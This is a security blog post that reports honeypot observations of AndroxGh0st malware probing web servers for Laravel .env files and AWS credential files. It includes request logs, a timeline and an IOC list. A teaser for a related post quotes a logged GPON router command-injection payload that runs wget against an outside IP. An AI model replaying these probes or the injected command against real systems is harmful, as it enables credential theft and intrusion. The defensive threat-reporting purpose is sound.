Skip to main content

AndroxGh0st – Stealing your AWS Key Pairs for Simple Email Service

AndroxGh0st is a family of malware written in Python that notoriously targets Laravel .env files. Since the inception of our new fleet of web honeypots deployed in December 2021, Sicehice has detected this activity and observed tens of thousands of requests with the HTTP POST body set to 0x[]=androxgh0st. Searching this string on GitHub yields various repositories, many of which help identify AWS secrets inadvertently exposed by the Laravel framework.

One feature of AndroxGh0st is the ability to search for exposed AWS credentials, namely looking for AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY identifiers. While individuals may mistakenly leak their key pairs to version control repositories such as GitHub, GitLab, or BitBucket, there is always the possibility of inadvertently leaking key pairs directly on web servers as well. AWS has gone through efforts to continually scan GitHub for AWS key pairs and automatically apply the AWS managed policy AWSCompromisedKeyQuarantine to key pairs that are committed to public repositories. This is a great step towards securing AWS environments, however, it is difficult to implement such a process on web servers all over the Internet. 

We recently observed an attack chain where a threat actor leveraged AndroxGh0st to find and use AWS key pairs. 

On the evening of January 24, 2023, we configured an AWS canary token in our various honeypots. By invoking requests to the sensor at the https://<IP>/.aws/credentials, the server responds with a file:


We then started to note the following requests to our sensors:

2023-01-25 02:18:33+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 07:42:24+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 09:15:07+00 109.237.97.180 POST /.aws/credentials 0x%5B%5D=androxgh0st Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 09:15:07+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 12:39:59+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

On January 25, 2023, we only noted requests from a single IP to /.aws/credentials with the androxgh0st string. At the time of writing, 109.237.97.180 (Hostglobal.plus – Moscow, Russia) is noted across eight sources in our detections.

Shortly after implementing the canaries, we started noticing requests to use the AWS key pairs, specifically making AWS API calls to GetSendQuota. The first request occurred on January 25, 2023:

2023-01-25 14:26:56 185.83.146.154 aws-sdk-php/3.154.6 GuzzleHttp/7 eventName:'GetSendQuota'

185.83.146.154 (Netinternet Bilisim Teknolojileri, Turkey) has been observed in seven unique data sources since April 13, 2022. In our sensors, we most recently noted this IP making AndroxGh0st requests on November 29, 2022.


Timeline:

Timestamp (UTC) Source IP Action Note
2022-11-29 23:16:22 185.83.146.154 POST /web/.env data="0x%5B%5D=androxgh0st", User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2023-01-25 02:18:33 109.237.97.180 GET /.aws/credentials User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2023-01-25 07:42:24 109.237.97.180 GET /.aws/credentials User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2023-01-25 09:15:07 109.237.97.180 POST /.aws/credentials User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2023-01-25 09:15:07 109.237.97.180 GET /.aws/credentials data="0x%5B%5D=androxgh0st", User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2023-01-25 12:39:59 109.237.97.180 GET /.aws/credentials User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2023-01-25 14:26:56 185.83.146.154 eventName='GetSendQuota' User-Agent="aws-sdk-php/3.154.6 GuzzleHttp/7"
2023-02-08 10:19:27 185.83.146.154 GET /.env Seen by AbuseIPDB with the same User-Agent probing .env files: ‘185.83.146.154 - - [08/Feb/2023:07:19:27 -0300] "GET /.env HTTP/1.1" 403 433 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"


IOCs:

IOC Description
185.83.146.154 IP invoking GetSendQuota API calls and requests for /aws/.credentials file
109.237.97.180 IP invoking requests for /aws/.credentials file
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 User-Agent associated with Androxgh0st events
aws-sdk-php/3.154.6 GuzzleHttp/7 User-Agent associated with GetSendQuota API calls


We’ve also setup an AndroxGh0st VirusTotal collection to share IP addresses invoking AndroxGh0st related requests: https://www.virustotal.com/gui/collection/4495e3df98c7ac11194fa7217421c2f00eec84e7d3a0c8b2a4ab80ba2298bc89

Comments

Popular posts from this blog

Inside a Compromised RDP Server - Bruteforcing Leads to LockBit Ransomware

As people trend towards remote work, IT departments have an ongoing need to provide remote services to end users. Without the use of traditional VPNs, technologies like Remote Desktop, Citrix and VMware are commonly used for remote access. However, they are not always configured in secure ways.  During the height of the pandemic, we setup two servers with Remote Desktop exposed to the Internet and created user "hello" with no password. Obviously, this is not a smart idea, but it does demonstrate what can happen when you have unsecured assets that are available directly on the Internet.  Scenario 1: Network Scanner Resulting in Abuse Complaint A scanning tool was used to scan for other servers listing on port 3389, which resulted in a complaint from Hetzner Online GmbH. The complaint was as follows: Figure 1: Abuse Complaint Received It is good that Hetzner has automated monitoring systems that will send abuse complaints automatically and one step in the right direction to mak

300 Days of New Web Honeypots

During December 2021, we deployed a new fleet of custom web honeypots written in Python Flask. The ongoing detections have been incorporated into our database as of January 3, 2022 and we are also pushing our detection feed to VirusTotal Collections . Approaching one year of of collections, here are some observations and stats: Locations where sensors are deployed: Sydney, AU Madrid, ES Amsterdam, NL Moscow, RU (which was forcibly shutdown due to sanctions imposed as a result of the 2022 Russian invasion of Ukraine) Chicago, US New Jersey, US Iowa, US We observed nearly 500,000 requests from over 38,000 unique IPs. A majority of the malware payloads we have observed are related to the Mozi botnet. You can find the related indicators shared on Abuse.ch ThreatFox here.   An example of this exploit observed in the POST body which targets GPON home routers (CVE-2018-10561) is as follows: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://221.205.75.243:48